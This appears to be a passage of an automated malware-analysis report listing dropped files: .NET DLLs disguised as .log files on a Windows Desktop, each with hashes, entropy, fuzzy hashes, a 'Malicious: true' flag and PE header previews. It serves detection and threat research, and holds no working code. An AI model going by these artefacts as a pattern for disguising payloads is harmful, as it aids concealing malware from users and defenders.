C:\Users\user\Desktop\QVwUKkQs.log

Download File

Process:	C:\Users\Public\Documents\GSwhJpqdkmruXxiphyV.exe
File Type:	PE32 executable (DLL) (console) Intel 80386 Mono/.Net assembly, for MS Windows
Category:	dropped
Size (bytes):	23552
Entropy (8bit):	5.519109060441589
Encrypted:	false
SSDEEP:	384:RlLUkmZJzLSTbmzQ0VeUfYtjdrrE2VMRSKOpRP07PUbTr4e16AKrl+7T:RlYZnV7YtjhrfMcKOpjb/9odg7T
MD5:	0B2AFABFAF0DD55AD21AC76FBF03B8A0
SHA1:	6BB6ED679B8BEDD26FDEB799849FB021F92E2E09
SHA-256:	DD4560987BD87EF3E6E8FAE220BA22AA08812E9743352523C846553BD99E4254
SHA-512:	D5125AD4A28CFA2E1F2C1D2A7ABF74C851A5FB5ECB9E27ECECAF1473F10254C7F3B0EEDA39337BD9D1BEFE0596E27C9195AD26EDF34538972A312179D211BDDA
Malicious:	true
Preview:	MZ......................@...............................................!..L.!This program cannot be run in DOS mode....$.......PE..L......d...........!.....T...........s... ........@.. ..............................vX....@.................................Xs..S.................................................................................... ............... ..H............text....S... ...T.................. ..`.rsrc................V..............@..@.reloc...............Z..............@..B.................s......H.......PO...$...........N......................................................................................................................................................................6...GN..n.....................................................................#...+...3...;...C...S...c...s...................................................................................................................................................................................

C:\Users\user\Desktop\QeOLILef.log

Download File

Process:	C:\Users\Public\Documents\GSwhJpqdkmruXxiphyV.exe
File Type:	PE32 executable (DLL) (console) Intel 80386 Mono/.Net assembly, for MS Windows
Category:	dropped
Size (bytes):	41472
Entropy (8bit):	5.6808219961645605
Encrypted:	false
SSDEEP:	768:IUVSXpIia8xiZ7tRCoz79t6DrMhvUsJAnmboowvDG:IFXRa/Lzugszmboowb
MD5:	6CD78D07F9BD4FECC55CDB392BC5EC89
SHA1:	094DE32070BED60A811D983740509054AD017CE4
SHA-256:	16CC3B734E72A74F578B63D08D81CC75B6C2445FB631EFD19F8A70D786871AD4
SHA-512:	5E25659A66E62F368ACD69790F0CF460008CAA3BB106E45CBA4755896B1872C02438C94E6FB5576891F29B3FEA95D8AAD9BCD7659C179D9619A1CDDB240AEB32
Malicious:	true
Preview:	MZ......................@...............................................!..L.!This program cannot be run in DOS mode....$.......PE..L......d...........!.................... ........@.. ....................................@.................................x...S.................................................................................... ............... ..H............text....... ...................... ..`.rsrc...............................@..@.reloc..............................@..B........................H........s...D...........r............................................................................................................................................................................9..A..%+..................................................................#...+...3...;...C...S...c...s...................................................................................................................................................................................

C:\Users\user\Desktop\QhHtScIC.log

Download File

Process:	C:\Users\Public\Documents\GSwhJpqdkmruXxiphyV.exe
File Type:	PE32 executable (DLL) (console) Intel 80386 Mono/.Net assembly, for MS Windows
Category:	dropped
Size (bytes):	23552
Entropy (8bit):	5.519109060441589
Encrypted:	false
SSDEEP:	384:RlLUkmZJzLSTbmzQ0VeUfYtjdrrE2VMRSKOpRP07PUbTr4e16AKrl+7T:RlYZnV7YtjhrfMcKOpjb/9odg7T
MD5:	0B2AFABFAF0DD55AD21AC76FBF03B8A0
SHA1:	6BB6ED679B8BEDD26FDEB799849FB021F92E2E09
SHA-256:	DD4560987BD87EF3E6E8FAE220BA22AA08812E9743352523C846553BD99E4254
SHA-512:	D5125AD4A28CFA2E1F2C1D2A7ABF74C851A5FB5ECB9E27ECECAF1473F10254C7F3B0EEDA39337BD9D1BEFE0596E27C9195AD26EDF34538972A312179D211BDDA
Malicious:	true
Preview:	MZ......................@...............................................!..L.!This program cannot be run in DOS mode....$.......PE..L......d...........!.....T...........s... ........@.. ..............................vX....@.................................Xs..S.................................................................................... ............... ..H............text....S... ...T.................. ..`.rsrc................V..............@..@.reloc...............Z..............@..B.................s......H.......PO...$...........N......................................................................................................................................................................6...GN..n.....................................................................#...+...3...;...C...S...c...s...................................................................................................................................................................................

C:\Users\user\Desktop\RMYUaxxv.log

Download File

Process:	C:\Users\Public\Documents\GSwhJpqdkmruXxiphyV.exe
File Type:	PE32 executable (DLL) (console) Intel 80386 Mono/.Net assembly, for MS Windows
Category:	dropped
Size (bytes):	40448
Entropy (8bit):	5.7028690200758465
Encrypted:	false
SSDEEP:	768:HjeDAXQDM/RgUK+1x85+CnTzP5KJcSdhRGPQPfnay:HjWB2CnTzUJcSdTdP/
MD5:	51B1964F31C557AE8C2B01EA164ABD9F
SHA1:	97C6E8FD1F21D644281FAF82D017969FE22423E4
SHA-256:	AF584F142A9A5A79355B212F8D7A2E3793E33FF23D50FDE591FB2F3E49BF308C
SHA-512:	5D06650D77DD2D574A31664FE9CEAD5E13941F99B2CFA8ECAD972B9E999422816E43A2BE469D9BBDF2778654C22A52656D23B9F230D2F6DF3F2305ABAE779AC3
Malicious:	true
Preview:	MZ......................@...............................................!..L.!This program cannot be run in DOS mode....$.......PE..L..."..d...........!................n.... ........@.. ....................................@.....................................S.................................................................................... ............... ..H............text...t.... ...................... ..`.rsrc...............................@..@.reloc..............................@..B................P.......H........k..@I...........k...........................................................................................................................................................................B._.@.;..................................................................#...+...3...;...C...S...c...s...................................................................................................................................................................................

C:\Users\user\Desktop\ROyAPbqA.log

Download File

Process:	C:\Users\Public\Documents\GSwhJpqdkmruXxiphyV.exe
File Type:	PE32 executable (DLL) (console) Intel 80386 Mono/.Net assembly, for MS Windows
Category:	dropped
Size (bytes):	50176
Entropy (8bit):	5.723168999026349
Encrypted:	false
SSDEEP:	768:7PCvZsxIexhaqgbv8yGk/A/4NPmAQeMeYzlP58gH8zGTCWxttXyZPM:7P4ZsxIelkY/O+DeuzYbM5xXiE
MD5:	2E116FC64103D0F0CF47890FD571561E
SHA1:	3EF08A9B057D1876C24FC76E937CDA461FAC6071
SHA-256:	25EEEA99DCA05BF7651264FA0C07E0E91D89E0DA401C387284E9BE9AFDF79625
SHA-512:	39D09DE00E738B01B6D8D423BA05C61D08E281482C83835F4C88D2F87E6E0536DDC0101872CBD97C30F977BC223DFAE9FCB3DB71DD8078B7EB5B5A4D0D5207A8
Malicious:	true
Preview:	MZ......................@...............................................!..L.!This program cannot be run in DOS mode....$.......PE..L......d...........!..................... ........@.. ....................... .......e....@.....................................K.................................................................................... ............... ..H............text........ ...................... ..`.rsrc...............................@..@.reloc..............................@..B........................H............M...................................................................................................................................................................................Xg;.6.'.1. b9g................................................................#...+...3...;...C...S...c...s...................................................................................................................................................................................

C:\Users\user\Desktop\RVLBDpEA.log

Download File

Process:	C:\Users\Public\Documents\GSwhJpqdkmruXxiphyV.exe
File Type:	PE32 executable (DLL) (console) Intel 80386 Mono/.Net assembly, for MS Windows
Category:	dropped
Size (bytes):	34304
Entropy (8bit):	5.618776214605176
Encrypted:	false
SSDEEP:	768:TBS4lqbgy0+q1nyfBYUyxYIAmghwpgAaaY5:TDY0+q1noBhyufmgCgxa
MD5:	9B25959D6CD6097C0EF36D2496876249
SHA1:	535B4D0576746D88537D4E9B01353210D893F4D2
SHA-256:	4DBA0293B2BA9478EC0738BAD92F0E56CB7CF800B0CA4FDA8261EE2C0C91E217
SHA-512:	C6FA40C2DA5B12683F2785F688984754DF5E11B95170B628F2721A21CD9A6E392672166892B994B8996DC961893A57DAD815C959C6076AB4F91404FEF66141FA
Malicious:	true
Preview:	MZ......................@...............................................!..L.!This program cannot be run in DOS mode....$.......PE..L......d...........!.....~..........n.... ........@.. ...............................G....@.....................................O.................................................................................... ............... ..H............text...t\|... ...~.................. ..`.rsrc...............................@..@.reloc..............................@..B................P.......H........c...8...........b.......................................................................................................................................................................,....:;.....>..................................................................#...+...3...;...C...S...c...s...................................................................................................................................................................................

C:\Users\user\Desktop\RvvRuIkR.log

Download File

Process:	C:\Users\Public\Documents\GSwhJpqdkmruXxiphyV.exe
File Type:	PE32 executable (DLL) (console) Intel 80386 Mono/.Net assembly, for MS Windows
Category:	dropped
Size (bytes):	38400
Entropy (8bit):	5.699005826018714
Encrypted:	false
SSDEEP:	768:bvTf5JA7rmkHDkK6/X7rpCA0U4oW+YcSNdb/deQoCDKmc:bTffImkjkK6/QAhaceb/dum
MD5:	87765D141228784AE91334BAE25AD743
SHA1:	442BA48B1B5BB158E2E6145B0592F81D20CB9C57
SHA-256:	9A121719F71383CF66FC36453679B36C8D24CC61EB335D0C304536E5D72AAAEB
SHA-512:	77FF7244F4E181A1F2B69A8814E1EFC0B7B55CD551B8D22F5A08039156295F6417D0E2E58265F1C07F8EA2BA3B24D9810B4B3E91B13943688C7450F736746657
Malicious:	true
Preview:	MZ......................@...............................................!..L.!This program cannot be run in DOS mode....$.......PE..L...c..d...........!..................... ........@.. ....................................@....................................O.................................................................................... ............... ..H............text...$.... ...................... ..`.rsrc...............................@..@.reloc..............................@..B........................H.......Dm...?..........<l......................................................................................................................................................................Q[..u.......;..................................................................#...+...3...;...C...S...c...s...................................................................................................................................................................................

C:\Users\user\Desktop\RzKbnuOl.log

Download File

Process:	C:\Users\Public\Documents\GSwhJpqdkmruXxiphyV.exe
File Type:	PE32 executable (DLL) (console) Intel 80386 Mono/.Net assembly, for MS Windows
Category:	dropped
Size (bytes):	70144
Entropy (8bit):	5.909536568846014
Encrypted:	false
SSDEEP:	1536:3LM14SKtpfLarGzoQWaqaQ2n5YejqSRKnYdYPgh3c//npRwM:w7KtpTjNNn5YejqSRKnYdYPgJo/pRwM
MD5:	E4FA63649F1DBD23DE91861BB39C317D
SHA1:	25F9115FAF40EC6736FACF2288CAA9B0E6AF9366
SHA-256:	CB4CD707305733ADDFCC54A69DF54A0C8D47C312D969B3E8D38B93E18CCBD8E4
SHA-512:	C4B5A9D66146D98D414BC84CD5C09588E2E02B800B21CE3172042AD7F48CC4AED54772D32C891A921FF102C0C3DB1FEAF52E4D4C714ABDB15F73BAEB9A6F5A39
Malicious:	true
Preview:	MZ......................@...............................................!..L.!This program cannot be run in DOS mode....$.......PE..L......d.........." .................)... ...@....@.. ..............................8.....@..................................(..S....@.......................`....................................................... ............... ..H............text...4.... ...................... ..`.rsrc........@......................@..@.reloc.......`......................@..B.................)......H..............................................................................................................................................................................................NC>.$qK...X....J................................................................#...+...3...;...C...S...c...s...................................................................................................................................................................................

C:\Users\user\Desktop\SYRbALIV.log

Download File

Process:	C:\Users\Public\Documents\GSwhJpqdkmruXxiphyV.exe
File Type:	PE32 executable (DLL) (console) Intel 80386 Mono/.Net assembly, for MS Windows
Category:	dropped
Size (bytes):	70144
Entropy (8bit):	5.909536568846014
Encrypted:	false
SSDEEP:	1536:3LM14SKtpfLarGzoQWaqaQ2n5YejqSRKnYdYPgh3c//npRwM:w7KtpTjNNn5YejqSRKnYdYPgJo/pRwM
MD5:	E4FA63649F1DBD23DE91861BB39C317D
SHA1:	25F9115FAF40EC6736FACF2288CAA9B0E6AF9366
SHA-256:	CB4CD707305733ADDFCC54A69DF54A0C8D47C312D969B3E8D38B93E18CCBD8E4
SHA-512:	C4B5A9D66146D98D414BC84CD5C09588E2E02B800B21CE3172042AD7F48CC4AED54772D32C891A921FF102C0C3DB1FEAF52E4D4C714ABDB15F73BAEB9A6F5A39
Malicious:	true
Preview:	MZ......................@...............................................!..L.!This program cannot be run in DOS mode....$.......PE..L......d.........." .................)... ...@....@.. ..............................8.....@..................................(..S....@.......................`....................................................... ............... ..H............text...4.... ...................... ..`.rsrc........@......................@..@.reloc.......`......................@..B.................)......H..............................................................................................................................................................................................NC>.$qK...X....J................................................................#...+...3...;...C...S...c...s...................................................................................................................................................................................

C:\Users\user\Desktop\TMGCsTQL.log

Download File

Process:	C:\Users\Public\Documents\GSwhJpqdkmruXxiphyV.exe
File Type:	PE32 executable (DLL) (console) Intel 80386 Mono/.Net assembly, for MS Windows
Category:	dropped
Size (bytes):	342528
Entropy (8bit):	6.170134230759619
Encrypted:	false
SSDEEP:	3072:YMRFbwlz0otnh0efcZBU/fbF+pzZDrpSToDxcLQcm+xCjNS3RaCtXAOZrNM1Ge6q:uhj/zQD9SocLQDchaUXAiNM1C3HuiH
MD5:	9DADB5C8A6FD5020275C31EE6BC61D63
SHA1:	ACE09D19F7DBB98F5C844E77F29A5D86E544CCC1
SHA-256:	80E21E05386AB5BF7BCFD745146700E2A73D808CAFDE3F1DAA256D09BCF4522F
SHA-512:	EDB9F8B4A3742AFD344B3E4957CD6A8574FA82EB49B45E75627180C42B51F9C019E241D695BAF0AAA36EE6959CE297C358BC592F2EE31B0BB5EA19FEED67FC7D
Malicious:	true
Preview:	MZ......................@...............................................!..L.!This program cannot be run in DOS mode....$.......PE..L...l..d.........." .....2...........P... ...`....@.. ...................................@.................................LP..O....`............................................................................... ............... ..H............text....0... ...2.................. ..`.rsrc........`.......4..............@..@.reloc...............8..............@..B.................P......H............p..................................................................................................................................................................................GJ2....mj..R...................................................................#...+...3...;...C...S...c...s...................................................................................................................................................................................

C:\Users\user\Desktop\TxiAPspM.log

Download File

Process:	C:\Users\Public\Documents\GSwhJpqdkmruXxiphyV.exe
File Type:	PE32 executable (DLL) (console) Intel 80386 Mono/.Net assembly, for MS Windows
Category:	dropped
Size (bytes):	39936
Entropy (8bit):	5.660491370279985
Encrypted:	false
SSDEEP:	768:1Q8H1q0rErIq3y48wo5iJyNJZ+pkw82VhgwgKZ:brErIqxPJRkw/VOwbZ
MD5:	240E98D38E0B679F055470167D247022
SHA1:	49888CCED719AE78EE3BAE2959402749668AA1C6
SHA-256:	C200E1BE39C35F8E57A0E1E241723FDB956089BC8EAD1235042456C7A3C4AD28
SHA-512:	93C1B6396C65C9EDACEFD6606A9563935D3C1331454DA69FA75D9B1CCE4D102A5F1B27B63FC3A7E485A083D8DAB1E6C4ECD01DD3CFED9B58DA6F4E90CC4F2998
Malicious:	true
Preview:	MZ......................@...............................................!..L.!This program cannot be run in DOS mode....$.......PE..L...n..d...........!.................... ........@.. ....................................@.....................................K.................................................................................... ............... ..H............text........ ...................... ..`.rsrc...............................@..@.reloc..............................@..B.......................H........q...@.......... q...........................................................................................................................................................................-\|{.3.g...p................................................................#...+...3...;...C...S...c...s...................................................................................................................................................................................

C:\Users\user\Desktop\UFHtrLcK.log

Download File

Process:	C:\Users\Public\Documents\GSwhJpqdkmruXxiphyV.exe
File Type:	PE32 executable (DLL) (console) Intel 80386 Mono/.Net assembly, for MS Windows
Category:	dropped
Size (bytes):	46592
Entropy (8bit):	5.870612048031897
Encrypted:	false
SSDEEP:	768:kEXtbvrhKJukN9LCewFI4eYWza7q9GYBAfNhgi2keA1RLaew5trbNM:NhKZEq4hWO7cAfN6DdA1R9w5x
MD5:	3601048DFB8C4A69313A593E74E5A2DE
SHA1:	A36A9842EA2D43D7ED024FFB936B4E9AE6E90338
SHA-256:	F5F1BA9E344B2F2E9CF90978C6D3518DFB55B316489E360874E3A1144BAC3C05
SHA-512:	B619A3D2C5CFADDEC234471FF68F96F19CFBBB5491439C3EE3593E0B2B6F995EBDC208563CC1B04FA383A983540646D02681B0CC039595C1845FE8F7941ABB23
Malicious:	true
Preview:	MZ......................@...............................................!..L.!This program cannot be run in DOS mode....$.......PE..L...j..d...........!..................... ........@.. ....................... .......h....@.....................................S.................................................................................... ............... ..H............text...$.... ...................... ..`.rsrc...............................@..@.reloc..............................@..B........................H............K...........w.................................................................................................................................................................................$A.................................................................#...+...3...;...C...S...c...s...................................................................................................................................................................................

C:\Users\user\Desktop\UHOiAYcz.log

Download File

Process:	C:\Users\Public\Documents\GSwhJpqdkmruXxiphyV.exe
File Type:	PE32 executable (DLL) (console) Intel 80386 Mono/.Net assembly, for MS Windows
Category:	dropped
Size (bytes):	126976
Entropy (8bit):	6.057993947082715
Encrypted:	false
SSDEEP:	3072:V2IJq7YkHFJwBTZtHrC/0/FHkINvdF+nTCkjk1U+1:V2IJq7YbrFHkIrgnTQ
MD5:	16B480082780CC1D8C23FB05468F64E7
SHA1:	6FDDF86F9F0FBAA189F5CB79E44999A3F1AC2B26
SHA-256:	7A080D8BD178EC02C7F39F7F941479074C450C4FDD8E963C993D2FB5537C7708
SHA-512:	A165BB5D7972DE124F670BCAC20B4A46727B7CF27D1ED925D02F7CC7C79D7D04122D7C202C67D7EAE798348E8D481F085282EB5B89D84B902607D7EB1155BA19
Malicious:	true
Preview:	MZ......................@...............................................!..L.!This program cannot be run in DOS mode....$.......PE..L......d.........." ..................... ... ....@.. .......................`......:.....@.....................................O.... .......................@....................................................... ............... ..H............text...$.... ...................... ..`.rsrc........ ......................@..@.reloc.......@......................@..B........................H...........(...........<...h.........................................................@.......0.................................................................................................................................Y........;~..................................................................#...+...3...;...C...S...c...s...................................................................................................................................................

C:\Users\user\Desktop\USABMust.log

Download File

Process:	C:\Users\Public\Documents\GSwhJpqdkmruXxiphyV.exe
File Type:	PE32 executable (DLL) (console) Intel 80386 Mono/.Net assembly, for MS Windows
Category:	dropped
Size (bytes):	34816
Entropy (8bit):	5.636032516496583
Encrypted:	false
SSDEEP:	384:JS7LcTqpkHdmLrBmyOLkOPXVcqTZH0uZLSHtciyBDVGehpx3ZPyp1MoCy07G7:J+CaBoXTZH0mUfoGCzpapaFy07
MD5:	996BD447A16F0A20F238A611484AFE86
SHA1:	CB0F51CE7FEEE1B5F02D3F13E60D67AF448C478D
SHA-256:	0CB182B9F8BD0804FC3BBA016926199C536BD7491BA577E089271DC1A63B07BE
SHA-512:	80924C19FAF3916DB5F71BE5723B6CB7BB7F731DBBA05B8218746F11FB9470F746B7AC581DB398E388377637811319EF8D6841504DC8EA39C510D7CFCD25184C
Malicious:	true
Preview:	MZ......................@...............................................!..L.!This program cannot be run in DOS mode....$.......PE..L...v..d...........!..................... ........@.. ...............................[....@.................................l...O.................................................................................... ............... ..H............text....~... ...................... ..`.rsrc...............................@..@.reloc..............................@..B........................H........b...;...........a.......................................................................................................................................................................k.X...=.%Cu..................................................................#...+...3...;...C...S...c...s...................................................................................................................................................................................

C:\Users\user\Desktop\UqASurOe.log

Download File

Process:	C:\Users\Public\Documents\GSwhJpqdkmruXxiphyV.exe
File Type:	PE32 executable (DLL) (console) Intel 80386 Mono/.Net assembly, for MS Windows
Category:	dropped
Size (bytes):	342528
Entropy (8bit):	6.170134230759619
Encrypted:	false
SSDEEP:	3072:YMRFbwlz0otnh0efcZBU/fbF+pzZDrpSToDxcLQcm+xCjNS3RaCtXAOZrNM1Ge6q:uhj/zQD9SocLQDchaUXAiNM1C3HuiH
MD5:	9DADB5C8A6FD5020275C31EE6BC61D63
SHA1:	ACE09D19F7DBB98F5C844E77F29A5D86E544CCC1
SHA-256:	80E21E05386AB5BF7BCFD745146700E2A73D808CAFDE3F1DAA256D09BCF4522F
SHA-512:	EDB9F8B4A3742AFD344B3E4957CD6A8574FA82EB49B45E75627180C42B51F9C019E241D695BAF0AAA36EE6959CE297C358BC592F2EE31B0BB5EA19FEED67FC7D
Malicious:	true
Preview:	MZ......................@...............................................!..L.!This program cannot be run in DOS mode....$.......PE..L...l..d.........." .....2...........P... ...`....@.. ...................................@.................................LP..O....`............................................................................... ............... ..H............text....0... ...2.................. ..`.rsrc........`.......4..............@..@.reloc...............8..............@..B.................P......H............p..................................................................................................................................................................................GJ2....mj..R...................................................................#...+...3...;...C...S...c...s...................................................................................................................................................................................

C:\Users\user\Desktop\VCjBMLrF.log

Download File

Process:	C:\Users\Public\Documents\GSwhJpqdkmruXxiphyV.exe
File Type:	PE32 executable (DLL) (console) Intel 80386 Mono/.Net assembly, for MS Windows
Category:	dropped
Size (bytes):	33792
Entropy (8bit):	5.541771649974822
Encrypted:	false
SSDEEP:	768:VA51bYJhOlZVuS6c4UvEEXLeeG+NOInR:VJEx6f2EEbee/Bn
MD5:	2D6975FD1CC3774916D8FF75C449EE7B
SHA1:	0C3A915F80D20BFF0BB4023D86ACAF80AF30F98D
SHA-256:	75CE6EB6CDDD67D47FB7C5782F45FDC497232F87A883650BA98679F92708A986
SHA-512:	6B9792C609E0A3F729AE2F188DE49E66067E3808E5B412E6DC56A555BC95656DA62ECD07D931B05756303A65383B029E7862C04CA5EA879A3FDFB61789BD2580
Malicious:	true
Preview:	MZ......................@...............................................!..L.!This program cannot be run in DOS mode....$.......PE..L......d...........!.....\|............... ........@.. ....................................@.................................T...W.................................................................................... ............... ..H............text....z... ...\|.................. ..`.rsrc................~..............@..@.reloc..............................@..B........................H.......Tl...............h..h....................................................................................................................................................................aF..g~Z........................................................................#...+...3...;...C...S...c...s...................................................................................................................................................................................

C:\Users\user\Desktop\VPbJhuHo.log

Download File

Process:	C:\Users\Public\Documents\GSwhJpqdkmruXxiphyV.exe
File Type:	PE32 executable (DLL) (console) Intel 80386 Mono/.Net assembly, for MS Windows
Category:	dropped
Size (bytes):	70144
Entropy (8bit):	5.909536568846014
Encrypted:	false
SSDEEP:	1536:3LM14SKtpfLarGzoQWaqaQ2n5YejqSRKnYdYPgh3c//npRwM:w7KtpTjNNn5YejqSRKnYdYPgJo/pRwM
MD5:	E4FA63649F1DBD23DE91861BB39C317D
SHA1:	25F9115FAF40EC6736FACF2288CAA9B0E6AF9366
SHA-256:	CB4CD707305733ADDFCC54A69DF54A0C8D47C312D969B3E8D38B93E18CCBD8E4
SHA-512:	C4B5A9D66146D98D414BC84CD5C09588E2E02B800B21CE3172042AD7F48CC4AED54772D32C891A921FF102C0C3DB1FEAF52E4D4C714ABDB15F73BAEB9A6F5A39
Malicious:	true
Preview:	MZ......................@...............................................!..L.!This program cannot be run in DOS mode....$.......PE..L......d.........." .................)... ...@....@.. ..............................8.....@..................................(..S....@.......................`....................................................... ............... ..H............text...4.... ...................... ..`.rsrc........@......................@..@.reloc.......`......................@..B.................)......H..............................................................................................................................................................................................NC>.$qK...X....J................................................................#...+...3...;...C...S...c...s...................................................................................................................................................................................

C:\Users\user\Desktop\VrxiBoaL.log

Download File

Process:	C:\Users\Public\Documents\GSwhJpqdkmruXxiphyV.exe
File Type:	PE32 executable (DLL) (console) Intel 80386 Mono/.Net assembly, for MS Windows
Category:	dropped
Size (bytes):	32256
Entropy (8bit):	5.631194486392901
Encrypted:	false
SSDEEP:	384:lP/qZmINM9WPs9Q617EsO2m2g7udB2HEsrW+a4yiym4I16Gl:lP/imaPyQ4T5dsHSt9nQ
MD5:	D8BF2A0481C0A17A634D066A711C12E9
SHA1:	7CC01A58831ED109F85B64FE4920278CEDF3E38D
SHA-256:	2B93377EA087225820A9F8E4F331005A0C600D557242366F06E0C1EAE003D669
SHA-512:	7FB4EB786528AD15DF044F16973ECA05F05F035491E9B1C350D6AA30926AAE438E98F37BE1BB80510310A91BC820BA3EDDAF7759D7D599BCDEBA0C9DF6302F60
Malicious:	true
Preview:	MZ......................@...............................................!..L.!This program cannot be run in DOS mode....$.......PE..L......d...........!.....v..........n.... ........@.. ....................................@.....................................O.................................................................................... ............... ..H............text...tt... ...v.................. ..`.rsrc................x..............@..@.reloc...............\|..............@..B................P.......H........c...1..........._..h....................................................................................................................................................................Q.1k...].~g.v................................................................#...+...3...;...C...S...c...s...................................................................................................................................................................................

C:\Users\user\Desktop\WJARWHgu.log

Download File

Process:	C:\Users\Public\Documents\GSwhJpqdkmruXxiphyV.exe
File Type:	PE32 executable (DLL) (console) Intel 80386 Mono/.Net assembly, for MS Windows
Category:	dropped
Size (bytes):	40448
Entropy (8bit):	5.7028690200758465
Encrypted:	false
SSDEEP:	768:HjeDAXQDM/RgUK+1x85+CnTzP5KJcSdhRGPQPfnay:HjWB2CnTzUJcSdTdP/
MD5:	51B1964F31C557AE8C2B01EA164ABD9F
SHA1:	97C6E8FD1F21D644281FAF82D017969FE22423E4
SHA-256:	AF584F142A9A5A79355B212F8D7A2E3793E33FF23D50FDE591FB2F3E49BF308C
SHA-512:	5D06650D77DD2D574A31664FE9CEAD5E13941F99B2CFA8ECAD972B9E999422816E43A2BE469D9BBDF2778654C22A52656D23B9F230D2F6DF3F2305ABAE779AC3
Malicious:	true
Preview:	MZ......................@...............................................!..L.!This program cannot be run in DOS mode....$.......PE..L..."..d...........!................n.... ........@.. ....................................@.....................................S.................................................................................... ............... ..H............text...t.... ...................... ..`.rsrc...............................@..@.reloc..............................@..B................P.......H........k..@I...........k...........................................................................................................................................................................B._.@.;..................................................................#...+...3...;...C...S...c...s...................................................................................................................................................................................

C:\Users\user\Desktop\WLgLezrK.log

Download File

Process:	C:\Users\Public\Documents\GSwhJpqdkmruXxiphyV.exe
File Type:	PE32 executable (DLL) (console) Intel 80386 Mono/.Net assembly, for MS Windows
Category:	dropped
Size (bytes):	40448
Entropy (8bit):	5.7028690200758465
Encrypted:	false
SSDEEP:	768:HjeDAXQDM/RgUK+1x85+CnTzP5KJcSdhRGPQPfnay:HjWB2CnTzUJcSdTdP/
MD5:	51B1964F31C557AE8C2B01EA164ABD9F
SHA1:	97C6E8FD1F21D644281FAF82D017969FE22423E4
SHA-256:	AF584F142A9A5A79355B212F8D7A2E3793E33FF23D50FDE591FB2F3E49BF308C
SHA-512:	5D06650D77DD2D574A31664FE9CEAD5E13941F99B2CFA8ECAD972B9E999422816E43A2BE469D9BBDF2778654C22A52656D23B9F230D2F6DF3F2305ABAE779AC3
Malicious:	true
Preview:	MZ......................@...............................................!..L.!This program cannot be run in DOS mode....$.......PE..L..."..d...........!................n.... ........@.. ....................................@.....................................S.................................................................................... ............... ..H............text...t.... ...................... ..`.rsrc...............................@..@.reloc..............................@..B................P.......H........k..@I...........k...........................................................................................................................................................................B._.@.;..................................................................#...+...3...;...C...S...c...s...................................................................................................................................................................................

C:\Users\user\Desktop\WVQzPKeN.log

Download File

Process:	C:\Users\user\Desktop\vb8DOBZQ4X.exe
File Type:	PE32 executable (DLL) (console) Intel 80386 Mono/.Net assembly, for MS Windows
Category:	dropped
Size (bytes):	34304
Entropy (8bit):	5.618776214605176
Encrypted:	false
SSDEEP:	768:TBS4lqbgy0+q1nyfBYUyxYIAmghwpgAaaY5:TDY0+q1noBhyufmgCgxa
MD5:	9B25959D6CD6097C0EF36D2496876249
SHA1:	535B4D0576746D88537D4E9B01353210D893F4D2
SHA-256:	4DBA0293B2BA9478EC0738BAD92F0E56CB7CF800B0CA4FDA8261EE2C0C91E217
SHA-512:	C6FA40C2DA5B12683F2785F688984754DF5E11B95170B628F2721A21CD9A6E392672166892B994B8996DC961893A57DAD815C959C6076AB4F91404FEF66141FA
Malicious:	true
Preview:	MZ......................@...............................................!..L.!This program cannot be run in DOS mode....$.......PE..L......d...........!.....~..........n.... ........@.. ...............................G....@.....................................O.................................................................................... ............... ..H............text...t\|... ...~.................. ..`.rsrc...............................@..@.reloc..............................@..B................P.......H........c...8...........b.......................................................................................................................................................................,....:;.....>..................................................................#...+...3...;...C...S...c...s...................................................................................................................................................................................

C:\Users\user\Desktop\WWrklrjU.log

Download File

Process:	C:\Users\Public\Documents\GSwhJpqdkmruXxiphyV.exe
File Type:	PE32 executable (DLL) (console) Intel 80386 Mono/.Net assembly, for MS Windows
Category:	dropped
Size (bytes):	342528
Entropy (8bit):	6.170134230759619
Encrypted:	false
SSDEEP:	3072:YMRFbwlz0otnh0efcZBU/fbF+pzZDrpSToDxcLQcm+xCjNS3RaCtXAOZrNM1Ge6q:uhj/zQD9SocLQDchaUXAiNM1C3HuiH
MD5:	9DADB5C8A6FD5020275C31EE6BC61D63
SHA1:	ACE09D19F7DBB98F5C844E77F29A5D86E544CCC1
SHA-256:	80E21E05386AB5BF7BCFD745146700E2A73D808CAFDE3F1DAA256D09BCF4522F
SHA-512:	EDB9F8B4A3742AFD344B3E4957CD6A8574FA82EB49B45E75627180C42B51F9C019E241D695BAF0AAA36EE6959CE297C358BC592F2EE31B0BB5EA19FEED67FC7D
Malicious:	true
Preview:	MZ......................@...............................................!..L.!This program cannot be run in DOS mode....$.......PE..L...l..d.........." .....2...........P... ...`....@.. ...................................@.................................LP..O....`............................................................................... ............... ..H............text....0... ...2.................. ..`.rsrc........`.......4..............@..@.reloc...............8..............@..B.................P......H............p..................................................................................................................................................................................GJ2....mj..R...................................................................#...+...3...;...C...S...c...s...................................................................................................................................................................................

C:\Users\user\Desktop\XEBuDdCj.log

Download File

Process:	C:\Users\Public\Documents\GSwhJpqdkmruXxiphyV.exe
File Type:	PE32 executable (DLL) (console) Intel 80386 Mono/.Net assembly, for MS Windows
Category:	dropped
Size (bytes):	38400
Entropy (8bit):	5.699005826018714
Encrypted:	false
SSDEEP:	768:bvTf5JA7rmkHDkK6/X7rpCA0U4oW+YcSNdb/deQoCDKmc:bTffImkjkK6/QAhaceb/dum
MD5:	87765D141228784AE91334BAE25AD743
SHA1:	442BA48B1B5BB158E2E6145B0592F81D20CB9C57
SHA-256:	9A121719F71383CF66FC36453679B36C8D24CC61EB335D0C304536E5D72AAAEB
SHA-512:	77FF7244F4E181A1F2B69A8814E1EFC0B7B55CD551B8D22F5A08039156295F6417D0E2E58265F1C07F8EA2BA3B24D9810B4B3E91B13943688C7450F736746657
Malicious:	true
Preview:	MZ......................@...............................................!..L.!This program cannot be run in DOS mode....$.......PE..L...c..d...........!..................... ........@.. ....................................@....................................O.................................................................................... ............... ..H............text...$.... ...................... ..`.rsrc...............................@..@.reloc..............................@..B........................H.......Dm...?..........<l......................................................................................................................................................................Q[..u.......;..................................................................#...+...3...;...C...S...c...s...................................................................................................................................................................................

C:\Users\user\Desktop\XGbZsHvp.log

Download File

Process:	C:\Users\Public\Documents\GSwhJpqdkmruXxiphyV.exe
File Type:	PE32 executable (DLL) (console) Intel 80386 Mono/.Net assembly, for MS Windows
Category:	dropped
Size (bytes):	34816
Entropy (8bit):	5.636032516496583
Encrypted:	false
SSDEEP:	384:JS7LcTqpkHdmLrBmyOLkOPXVcqTZH0uZLSHtciyBDVGehpx3ZPyp1MoCy07G7:J+CaBoXTZH0mUfoGCzpapaFy07
MD5:	996BD447A16F0A20F238A611484AFE86
SHA1:	CB0F51CE7FEEE1B5F02D3F13E60D67AF448C478D
